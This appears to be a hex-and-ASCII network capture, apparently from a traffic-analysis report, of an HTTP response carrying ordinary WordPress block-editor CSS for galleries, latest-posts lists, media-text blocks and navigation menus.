                                                                                              Data Ascii: s-gallery-grid .blocks-gallery-image figure,.blocks-gallery-grid .blocks-gallery-item figure,.wp-block-gallery .blocks-gallery-image figure,.wp-block-gallery .blocks-gallery-item figure{display:flex;align-items:flex-end;justify-content:flex-start}}.blocks
                                                                                              2021-12-13 23:57:32 UTC8278INData Raw: 69 6f 6e 20 69 6d 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 20 66 69 67 63 61 70 74 69 6f 6e 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 20 66 69 67 63 61 70 74 69 6f 6e 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 2e 69 73 2d 63 72 6f 70 70 65 64 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 2e 69 73 2d 63 72 6f 70 70 65 64 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 69 73 2d 63 72 6f 70 70 65 64 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e
                                                                                              Data Ascii: ion img{display:inline}.blocks-gallery-grid figcaption,.wp-block-gallery figcaption{flex-grow:1}.blocks-gallery-grid.is-cropped .blocks-gallery-image,.blocks-gallery-grid.is-cropped .blocks-gallery-item,.wp-block-gallery.is-cropped .blocks-gallery-image,.
                                                                                              2021-12-13 23:57:32 UTC8279INData Raw: 72 69 64 2e 63 6f 6c 75 6d 6e 73 2d 31 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 63 6f 6c 75 6d 6e 73 2d 31 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 63 6f 6c 75 6d 6e 73 2d 31 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 7b 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 2e 63 6f 6c 75 6d 6e 73 2d 33 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67
                                                                                              Data Ascii: rid.columns-1 .blocks-gallery-item,.wp-block-gallery.columns-1 .blocks-gallery-image,.wp-block-gallery.columns-1 .blocks-gallery-item{width:100%;margin-right:0}@media (min-width:600px){.blocks-gallery-grid.columns-3 .blocks-gallery-image,.blocks-gallery-g
                                                                                              2021-12-13 23:57:32 UTC8280INData Raw: 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 7b 77 69 64 74 68 3a 63 61 6c 63 28 31 34 2e 32 38 35 37 31 25 20 2d 20 2e 38 35 37 31 34 65 6d 29 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 2e 63 6f 6c 75 6d 6e 73 2d 38 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 2e 63 6f 6c 75 6d 6e 73 2d 38 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 63 6f 6c 75 6d 6e 73 2d 38 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 63 6f 6c 75 6d 6e 73 2d 38 20 2e 62 6c 6f 63
                                                                                              Data Ascii: cks-gallery-item{width:calc(14.28571% - .85714em);margin-right:1em}.blocks-gallery-grid.columns-8 .blocks-gallery-image,.blocks-gallery-grid.columns-8 .blocks-gallery-item,.wp-block-gallery.columns-8 .blocks-gallery-image,.wp-block-gallery.columns-8 .bloc
                                                                                              2021-12-13 23:57:32 UTC8282INData Raw: 6e 73 2d 38 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 38 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 63 6f 6c 75 6d 6e 73 2d 31 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 31 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 63 6f 6c 75 6d 6e 73 2d 31 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 31 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 63 6f 6c 75 6d 6e 73 2d 32 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 32 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72
                                                                                              Data Ascii: ns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery.columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery.columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery.columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-galler
                                                                                              2021-12-13 23:57:32 UTC8283INData Raw: 61 6c 6c 65 72 79 2d 67 72 69 64 2e 61 6c 69 67 6e 72 69 67 68 74 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 61 6c 69 67 6e 6c 65 66 74 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 61 6c 69 67 6e 72 69 67 68 74 7b 6d 61 78 2d 77 69 64 74 68 3a 34 32 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 2e 61 6c 69 67 6e 63 65 6e 74 65 72 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 20 66 69 67 75 72 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 61 6c 69 67 6e 63 65 6e 74 65 72 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 20 66 69 67 75 72 65 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c
                                                                                              Data Ascii: allery-grid.alignright,.wp-block-gallery.alignleft,.wp-block-gallery.alignright{max-width:420px;width:100%}.blocks-gallery-grid.aligncenter .blocks-gallery-item figure,.wp-block-gallery.aligncenter .blocks-gallery-item figure{justify-content:center}.wp-bl
                                                                                              2021-12-13 23:57:32 UTC8284INData Raw: 69 6d 61 67 65 2e 69 73 2d 73 74 79 6c 65 2d 63 69 72 63 6c 65 2d 6d 61 73 6b 20 69 6d 67 7b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 75 74 66 38 2c 3c 73 76 67 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 20 31 30 30 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 22 20 63 79 3d 22 35 30 22 20 72 3d 22 35 30 22 2f 3e 3c 2f 73 76 67 3e 27 29 3b 6d 61 73 6b 2d 69 6d 61 67 65 3a 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 75 74 66 38 2c 3c 73 76 67 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 20 31 30 30 22 20 78 6d 6c 6e 73 3d
                                                                                              Data Ascii: image.is-style-circle-mask img{-webkit-mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns=
                                                                                              2021-12-13 23:57:32 UTC8286INData Raw: 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 35 65 6d 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 68 65 69 67 68 74 3a 32 2e 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 37 35 65 6d 3b 77 69 64 74 68 3a 32 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 2e 61 6c 69 67 6e 6c 65 66 74 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 2e 61 6c 69 67 6e 72 69 67 68 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 5f 5f 6c 69 73 74 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61
                                                                                              Data Ascii: der-radius:1.5em;display:block;float:left;height:2.5em;margin-right:.75em;width:2.5em}.wp-block-latest-posts.alignleft{margin-right:2em}.wp-block-latest-posts.alignright{margin-left:2em}.wp-block-latest-posts.wp-block-latest-posts__list{list-style:none;pa
                                                                                              2021-12-13 23:57:32 UTC8287INData Raw: 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 5f 5f 66 65 61 74 75 72 65 64 2d 69 6d 61 67 65 20 69 6d 67 7b 68 65 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 5f 5f 66 65 61 74 75 72 65 64 2d 69 6d 61 67 65 2e 61 6c 69 67 6e 6c 65 66 74 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 5f 5f 66 65 61 74 75 72 65 64 2d 69 6d 61 67 65 2e 61 6c 69 67 6e 72 69 67 68 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73
                                                                                              Data Ascii: isplay:inline-block}.wp-block-latest-posts__featured-image img{height:auto;width:auto;max-width:100%}.wp-block-latest-posts__featured-image.alignleft{margin-right:1em}.wp-block-latest-posts__featured-image.alignright{margin-left:1em}.wp-block-latest-posts
                                                                                              2021-12-13 23:57:32 UTC8288INData Raw: 69 61 2d 74 65 78 74 5f 5f 63 6f 6e 74 65 6e 74 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 2e 69 73 2d 76 65 72 74 69 63 61 6c 6c 79 2d 61 6c 69 67 6e 65 64 2d 62 6f 74 74 6f 6d 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 5f 5f 6d 65 64 69 61 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 65 6e 64 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 5f 5f 6d 65 64 69 61 7b 0a 20 20 2f 2a 21 72 74 6c 3a 62 65 67 69 6e 3a 69 67 6e 6f 72 65 2a 2f 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 31 3b 67 72 69 64 2d 72 6f 77 3a 31 3b 0a 20 20 2f 2a 21 72 74 6c 3a 65 6e 64 3a 69 67 6e 6f 72 65 2a 2f 6d 61 72 67 69 6e 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d
                                                                                              Data Ascii: ia-text__content,.wp-block-media-text.is-vertically-aligned-bottom .wp-block-media-text__media{align-self:end}.wp-block-media-text .wp-block-media-text__media{ /*!rtl:begin:ignore*/grid-column:1;grid-row:1; /*!rtl:end:ignore*/margin:0}.wp-block-media-
                                                                                              2021-12-13 23:57:32 UTC8290INData Raw: 37 66 66 38 0d 0a 6c 75 6d 6e 73 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 2e 69 73 2d 73 74 61 63 6b 65 64 2d 6f 6e 2d 6d 6f 62 69 6c 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 5f 5f 6d 65 64 69 61 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 31 3b 67 72 69 64 2d 72 6f 77 3a 31 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 2e 69 73 2d 73 74 61 63 6b 65 64 2d 6f 6e 2d 6d 6f 62 69 6c 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 5f 5f 63 6f 6e 74 65 6e 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 31 3b 67 72 69 64 2d 72 6f 77 3a 32 7d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74
                                                                                              Data Ascii: 7ff8lumns:100%!important}.wp-block-media-text.is-stacked-on-mobile .wp-block-media-text__media{grid-column:1;grid-row:1}.wp-block-media-text.is-stacked-on-mobile .wp-block-media-text__content{grid-column:1;grid-row:2}}.wp-block-navigation{position:relat
                                                                                              2021-12-13 23:57:32 UTC8291INData Raw: 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5b 73 74 79 6c 65 2a 3d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 5d 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 73 2d 6c 69 73 74 5f 5f 69 74 65 6d 5f 5f 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5b 73 74 79 6c 65 2a 3d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 5d 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 73 2d 6c 69 73 74 5f 5f 69 74 65 6d 5f 5f 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 3a 6e 6f 74 28 5b 73 74 79 6c 65 2a 3d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 5d 29 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e
                                                                                              Data Ascii: .wp-block-navigation[style*=text-decoration] .wp-block-pages-list__item__link:active,.wp-block-navigation[style*=text-decoration] .wp-block-pages-list__item__link:focus{text-decoration:inherit}.wp-block-navigation:not([style*=text-decoration]) .wp-block-n
                                                                                              2021-12-13 23:57:32 UTC8292INData Raw: 62 6c 6f 63 6b 2d 70 61 67 65 73 2d 6c 69 73 74 5f 5f 69 74 65 6d 5f 5f 6c 69 6e 6b 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 32 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e
                                                                                              Data Ascii: block-pages-list__item__link{margin-right:.5em}.wp-block-navigation .has-child .submenu-container,.wp-block-navigation .has-child .wp-block-navigation-link__container{background-color:inherit;color:inherit;position:absolute;z-index:2;flex-direction:column
                                                                                              2021-12-13 23:57:32 UTC8294INData Raw: 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 5f 5f 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 3e 2e 77 70 2d 62 6c 6f
                                                                                              Data Ascii: .submenu-container>.wp-block-navigation-link>.wp-block-navigation-link__submenu-icon,.wp-block-navigation .has-child .submenu-container>.wp-block-navigation-link>.wp-block-page-list__submenu-icon,.wp-block-navigation .has-child .submenu-container>.wp-blo
                                                                                              2021-12-13 23:57:32 UTC8295INData Raw: 69 6e 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 2e 35 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 20 73 76 67 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e
                                                                                              Data Ascii: iner:before{content:"";position:absolute;right:100%;height:100%;display:block;width:.5em;background:transparent}.wp-block-navigation .has-child .submenu-container .wp-block-navigation-link__submenu-icon svg,.wp-block-navigation .has-child .submenu-contain
                                                                                              2021-12-13 23:57:32 UTC8296INData Raw: 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76
                                                                                              Data Ascii: ock-navigation.items-justified-right>.wp-block-navigation__container .has-child .submenu-container,.wp-block-navigation.wp-block-navigation.items-justified-right>.wp-block-navigation__container .has-child .wp-block-navigation-link__container,.wp-block-nav
                                                                                              2021-12-13 23:57:32 UTC8298INData Raw: 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69
                                                                                              Data Ascii: wp-block-navigation-link__container .wp-block-navigation-link__container,.wp-block-navigation.wp-block-navigation.items-justified-right>.wp-block-navigation__container .has-child .submenu-container .submenu-container,.wp-block-navigation.wp-block-navigati
                                                                                              2021-12-13 23:57:32 UTC8299INData Raw: 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 3e 2e 68 61 73 2d 63 68 69 6c 64 3a 6c 61 73 74 2d 63 68 69 6c 64 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 73 70 61 63 65 2d 62 65 74 77 65
                                                                                              Data Ascii: igation-link__container,.wp-block-navigation.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .submenu-container .submenu-container,.wp-block-navigation.wp-block-navigation.items-justified-space-betwe
                                                                                              2021-12-13 23:57:32 UTC8300INData Raw: 6e 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 73 2d 6c 69 73 74 5f 5f 69 74 65 6d 7b 6d
                                                                                              Data Ascii: n.has-background .wp-block-navigation__container>.wp-block-navigation-link,.wp-block-navigation.wp-block-navigation.has-background .wp-block-page-list,.wp-block-navigation.wp-block-navigation.has-background .wp-block-page-list>.wp-block-pages-list__item{m
                                                                                              2021-12-13 23:57:32 UTC8302INData Raw: 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 65 6e 74 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 73 2d 6c 69 73 74 5f 5f 69 74 65 6d 5f 5f 6c 69 6e 6b 7b 70 61 64 64 69 6e 67 3a 2e 35 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61
                                                                                              Data Ascii: block-navigation .has-child .wp-block-navigation-link__container .wp-block-navigation-link__content,.wp-block-navigation.wp-block-navigation .has-child .wp-block-navigation-link__container .wp-block-pages-list__item__link{padding:.5em 1em}.wp-block-naviga
